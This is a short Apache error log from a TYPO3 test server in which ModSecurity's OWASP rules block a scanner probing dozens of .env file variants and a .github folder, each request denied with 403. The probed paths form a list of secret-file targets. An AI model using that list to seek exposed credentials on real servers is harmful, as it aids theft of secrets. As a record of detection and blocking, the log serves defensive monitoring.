[Mon Sep 30 03:12:39.228373 2024] [:error] [pid 2293049] [client 45.135.232.70:51220] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_1"] [unique_id "Zvn7B0SJuE_IczKl7y4uegAAAAY"]
[Mon Sep 30 03:12:39.275471 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51344] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.297017 2024] [:error] [pid 2292852] [client 45.135.232.70:51236] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "Zvn7B9yjaeShYxtARZtiVAAAAAU"]
[Mon Sep 30 03:12:39.297281 2024] [:error] [pid 2292852] [client 45.135.232.70:51236] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "Zvn7B9yjaeShYxtARZtiVAAAAAU"]
[Mon Sep 30 03:12:39.297468 2024] [:error] [pid 2292852] [client 45.135.232.70:51236] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "Zvn7B9yjaeShYxtARZtiVAAAAAU"]
[Mon Sep 30 03:12:39.317055 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:51356] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.321431 2024] [:error] [pid 2292829] [client 45.135.232.70:51216] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Zvn7B1EYK8s8ohUI_TBIngAAAAI"]
[Mon Sep 30 03:12:39.321790 2024] [:error] [pid 2292829] [client 45.135.232.70:51216] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Zvn7B1EYK8s8ohUI_TBIngAAAAI"]
[Mon Sep 30 03:12:39.322064 2024] [:error] [pid 2292829] [client 45.135.232.70:51216] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Zvn7B1EYK8s8ohUI_TBIngAAAAI"]
[Mon Sep 30 03:12:39.331242 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51334] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.335584 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51258] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.335816 2024] [:error] [pid 2293049] [client 45.135.232.70:51120] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "Zvn7B0SJuE_IczKl7y4uewAAAAY"]
[Mon Sep 30 03:12:39.336182 2024] [:error] [pid 2293049] [client 45.135.232.70:51120] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "Zvn7B0SJuE_IczKl7y4uewAAAAY"]
[Mon Sep 30 03:12:39.336401 2024] [:error] [pid 2293049] [client 45.135.232.70:51120] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "Zvn7B0SJuE_IczKl7y4uewAAAAY"]
[Mon Sep 30 03:12:39.384719 2024] [:error] [pid 2292830] [client 45.135.232.70:51104] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Zvn7B2NuTcAsKB-5zCITyQAAAAM"]
[Mon Sep 30 03:12:39.385224 2024] [:error] [pid 2292830] [client 45.135.232.70:51104] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Zvn7B2NuTcAsKB-5zCITyQAAAAM"]
[Mon Sep 30 03:12:39.385643 2024] [:error] [pid 2292830] [client 45.135.232.70:51104] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Zvn7B2NuTcAsKB-5zCITyQAAAAM"]
[Mon Sep 30 03:12:39.408676 2024] [:error] [pid 2292852] [client 45.135.232.70:51074] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Zvn7B9yjaeShYxtARZtiVQAAAAU"]
[Mon Sep 30 03:12:39.409167 2024] [:error] [pid 2292852] [client 45.135.232.70:51074] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Zvn7B9yjaeShYxtARZtiVQAAAAU"]
[Mon Sep 30 03:12:39.409684 2024] [:error] [pid 2292852] [client 45.135.232.70:51074] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Zvn7B9yjaeShYxtARZtiVQAAAAU"]
[Mon Sep 30 03:12:39.410100 2024] [:error] [pid 2292852] [client 45.135.232.70:51074] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Zvn7B9yjaeShYxtARZtiVQAAAAU"]
[Mon Sep 30 03:12:39.428111 2024] [:error] [pid 2292828] [client 45.135.232.70:51244] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Zvn7B2142CaB14yyWJ3d4gAAAAE"]
[Mon Sep 30 03:12:39.428796 2024] [:error] [pid 2292828] [client 45.135.232.70:51244] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Zvn7B2142CaB14yyWJ3d4gAAAAE"]
[Mon Sep 30 03:12:39.429317 2024] [:error] [pid 2292828] [client 45.135.232.70:51244] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "Zvn7B2142CaB14yyWJ3d4gAAAAE"]
[Mon Sep 30 03:12:39.434067 2024] [:error] [pid 2292829] [client 45.135.232.70:51118] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "Zvn7B1EYK8s8ohUI_TBInwAAAAI"]
[Mon Sep 30 03:12:39.434715 2024] [:error] [pid 2292829] [client 45.135.232.70:51118] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "Zvn7B1EYK8s8ohUI_TBInwAAAAI"]
[Mon Sep 30 03:12:39.435106 2024] [:error] [pid 2292829] [client 45.135.232.70:51118] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "Zvn7B1EYK8s8ohUI_TBInwAAAAI"]
[Mon Sep 30 03:12:39.444966 2024] [:error] [pid 2293061] [client 45.135.232.70:51086] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Zvn7B_4plfEpgwUkwScOagAAAAc"]
[Mon Sep 30 03:12:39.445319 2024] [:error] [pid 2293061] [client 45.135.232.70:51086] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Zvn7B_4plfEpgwUkwScOagAAAAc"]
[Mon Sep 30 03:12:39.445579 2024] [:error] [pid 2293061] [client 45.135.232.70:51086] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Zvn7B_4plfEpgwUkwScOagAAAAc"]
[Mon Sep 30 03:12:39.448385 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51362] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.449216 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51366] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.450226 2024] [:error] [pid 2292831] [client 45.135.232.70:51226] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExtgAAAAQ"]
[Mon Sep 30 03:12:39.450743 2024] [:error] [pid 2292831] [client 45.135.232.70:51226] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExtgAAAAQ"]
[Mon Sep 30 03:12:39.450973 2024] [:error] [pid 2292831] [client 45.135.232.70:51226] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExtgAAAAQ"]
[Mon Sep 30 03:12:39.501638 2024] [:error] [pid 2292830] [client 45.135.232.70:51114] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Zvn7B2NuTcAsKB-5zCITygAAAAM"]
[Mon Sep 30 03:12:39.502338 2024] [:error] [pid 2292830] [client 45.135.232.70:51114] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Zvn7B2NuTcAsKB-5zCITygAAAAM"]
[Mon Sep 30 03:12:39.502812 2024] [:error] [pid 2292830] [client 45.135.232.70:51114] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Zvn7B2NuTcAsKB-5zCITygAAAAM"]
[Mon Sep 30 03:12:39.525359 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:51296] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.550203 2024] [:error] [pid 2292828] [client 45.135.232.70:51190] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "Zvn7B2142CaB14yyWJ3d4wAAAAE"]
[Mon Sep 30 03:12:39.550687 2024] [:error] [pid 2292828] [client 45.135.232.70:51190] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "Zvn7B2142CaB14yyWJ3d4wAAAAE"]
[Mon Sep 30 03:12:39.550994 2024] [:error] [pid 2292828] [client 45.135.232.70:51190] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "Zvn7B2142CaB14yyWJ3d4wAAAAE"]
[Mon Sep 30 03:12:39.554159 2024] [:error] [pid 2292829] [client 45.135.232.70:51172] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "Zvn7B1EYK8s8ohUI_TBIoAAAAAI"]
[Mon Sep 30 03:12:39.554840 2024] [:error] [pid 2292829] [client 45.135.232.70:51172] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "Zvn7B1EYK8s8ohUI_TBIoAAAAAI"]
[Mon Sep 30 03:12:39.555377 2024] [:error] [pid 2292829] [client 45.135.232.70:51172] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "Zvn7B1EYK8s8ohUI_TBIoAAAAAI"]
[Mon Sep 30 03:12:39.562740 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51294] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.566284 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51254] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
